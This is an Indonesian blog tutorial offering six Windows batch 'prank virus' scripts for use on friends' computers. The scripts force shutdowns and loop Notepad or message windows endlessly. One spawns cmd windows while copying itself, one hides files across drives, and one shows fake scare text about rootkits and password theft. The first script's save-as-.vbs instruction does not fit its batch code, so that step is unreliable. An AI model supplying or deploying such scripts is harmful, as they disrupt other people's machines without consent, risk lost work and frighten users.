Serba Tutorial | Internet Marketing | Blogging | Komputer | Smartphone

Cara Membuat Virus Komputer Sederhana Menggunakan Notepad



Virus komputer identik dengan perusak yang dapat menyebabkan kerusakan fatal pada komputer. Nah pada kesempatan kali ini saya akan memberikan tutorial Cara Membuat Virus Komputer Sederhana Menggunakan Notepad. 

Virus komputer yang akan saya bagikan kali ini bukanlah sebuah virus yang berbahaya dan dapat menyebabkan kerusakan fatal, melainkan hanya untuk iseng-iseng saja dan dapat anda gunakan untuk ngerjain teman yang masih gaptek dengan komputer hehehe


Untuk tutorial pembuatannya sangatlah mudah dilakukan bahkan bila anda seorang pemula sekalipun, karena cara kerja virus sederhana ini hanyalah memanfaatkan perintah-perintah dasar komputer untuk membuat program tertentu.

Selain itu anda tak perlu menggunakan software khusus yang aneh-aneh atau apalah, anda hanya perlu menggunakan software bawaan komputer saja yaitu Notepad. Emang bisa? Ya bisa lah, silahkan simak saja tutorialnya berikut ini:

Cara Membuat Virus Komputer Sederhana Menggunakan Notepad

1.  Virus Untuk Membuat Komputer Shutdown Dengan Pesan Khusus

@echo off 
msg * kasian deh lo komputernya mau mati
shutdown -c "Error! hahaha ******!" -s 

Cara Membuatnya : Buka notepad kemudian copas kode script di atas lalu Save As, beri nama apa saja kemudian simpan dengan ekstensi *.vbs Save As type silahkan pilih All File.

2. Virus Untuk Membuat Notepad Otomatis Terbuka Terus-Menerus

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top  

Cara Membuatnya : Buka notepad kemudian copas kode script di atas lalu Save As, beri nama apa saja kemudian simpan dengan ekstensi *.bat jangan lupa juga Save As Type pilih All File.

Note : Yang berwarna biru dapat anda ganti dengan aplikasi atau software lain.

3. Virus Untuk Membuat Pesan Cinta


@ECHO off
:Begin
msg * Eh tau gak?
msg * Aku sebenernya sayang banget sama kamu.
msg * Mau gak jadi pacar aku?
msg * kalo kamu nolak terpaksa aku rusak komputer kamu!
msg * by twd.web.id
GOTO BEGIN

Cara Membuatnya : Buka notepad kemudian copas kode script di atas lalu Save As, beri nama apa saja kemudian simpan dengan ekstensi *.bat jangan lupa juga Save As Type pilih All File.

Note : Yang berwarna biru silahkan ganti dengan kata-kata yang di inginkan.

4. Virus Di Tolak Cinta


@echo off
COLOR 02
echo *************************************************
echo KAMU NOLAK CINTA AKU?
echo ***********
echo SERIUS?
echo ************************************
echo JANGAN NYESEL LOH YA
echo *************
echo MAAF YA TERPAKSA AKU RUSAK KOMPUTER KAMU!
echo *****************
echo =>> VIRUS MENGHAPUS SYSTEM WINDOWS
echo *********************************
echo =>> ROOTKIT MENGINVEKSI SYSTEM KOMPUTER
echo ***********************************
echo =>> TROJAN MENCURI PASSWORDS
echo ******************
echo =>> KAMU JAHAT SIH!
echo **************************************************
timeout /T 5 /nobreak
shutdown -s -t 5 -c "SILAHKAN BELI KOMPUTER BARU LAGI"  

Cara Membuatnya : Buka notepad kemudian copas kode script di atas lalu Save As, beri nama apa saja kemudian simpan dengan ekstensi *.bat jangan lupa juga Save As Type pilih All File.

5. Virus Untuk Membuat Cmd Terbuka Terus Menerus Dengan Pesan Menjengkelkan


@echo off
:haha
msg * kasian deh lu :v
md D:/ini-virus-%random%
copy *.bat virus-%random%.bat
start cmd
msg * hahahaha
goto haha

Cara Membuatnya : Buka notepad kemudian copas kode script di atas lalu Save As, beri nama apa saja kemudian simpan dengan ekstensi *.bat jangan lupa juga Save As Type pilih All File.

6. Virus Untuk Membuat  File Dalam Folder Menghilang


C:
attrib +r +s +h
D:
attrib +r +s +h
E:
Attrib +r +s +h
F:
attrib +r +s +h 

Cara Membuatnya : Buka notepad kemudian copas kode script di atas lalu Save As, beri nama apa saja kemudian simpan dengan ekstensi *.bat jangan lupa juga Save As Type pilih All File.

Virus ini akan membuat hilang semua file yang ada dalam satu folder dengan file virus ini, jika virus ini di klik maka semua file yang ada dalam satu folder akan otomatis menghilang, Virus ini tidak menghapus file, melainkan hanya di super hidden saja.

Untuk mengembalikan file yang telah di super hidden caranya adalah buka cmd => pilih lokasi file yang di super hidden contoh C: lalu tekan enter => selanjutnya masukan perintah ini Attrib -s -h -r *.* /s /d  kemudian tekan enter, maka file yang hilang dalam folder tadi akan muncul kembali.

Nah itulah tutorial kali ini mengenai Cara Membuat Virus Komputer Sederhana Menggunakan Notepad. Cukup sekian dan semoga bermanfaat.



Tags :
Share on Facebook
Share on Twitter
Share on Google+
Berlangganan Artikel Gratis Via Email



Copyright © 2016 - 2017 TWD.WEB.ID All Rights Reserved | About me | Contact us | Privacy Policy | Disclaimer | Sitemap | Link Partner